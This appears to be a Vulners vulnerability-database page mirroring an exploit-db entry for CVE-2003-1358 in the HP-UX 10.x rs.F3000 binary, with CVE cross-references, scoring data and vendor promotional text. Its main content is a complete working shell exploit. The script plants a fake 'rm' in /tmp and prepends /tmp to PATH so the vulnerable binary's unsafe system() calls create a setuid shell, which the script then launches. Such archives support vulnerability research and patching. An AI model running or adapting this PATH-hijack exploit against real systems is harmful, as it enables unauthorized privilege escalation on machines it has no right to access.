Lucene search
+L

HP-UX 10.x - rs.F3000 Unauthorized Access

🗓️ 12 Feb 2003 00:00:00Reported by Last Stage of DeliriumType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

rs.F3000 vulnerability allows unauthorized access and potential denial of service on HP-UX 10.x systems.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-1358
17 Oct 200701:00
cve
cvelist
Cvelist
CVE-2003-1358
17 Oct 200701:00
cvelist
euvd
EUVD
EUVD-2003-1348
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-1358
31 Dec 200305:00
nvd
source: https://www.securityfocus.com/bid/6837/info

The rs.F3000 binary is prone to an issue that may allow attackers to obtain unauthorized access to a vulnerable system. A denial of service attack is also possible. This is due to multiple instances of the system() function being used in an unsafe manner.

#!/bin/sh
## copyright LAST STAGE OF DELIRIUM may 2002 poland            *://lsd-pl.net/ #
## /usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000                              #

echo "copyright LAST STAGE OF DELIRIUM may 2002 poland  //lsd-pl.net/"
echo "/usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 for HP-UX 10.20 700/800"

cat > /tmp/rm << 'EOF'
    /usr/bin/cp /bin/sh /tmp/sh
    /usr/bin/chown daemon /tmp/sh
    /usr/bin/chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/rm

PATH=/tmp:$PATH
export PATH
/usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000
sleep 3
sh

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.00954
32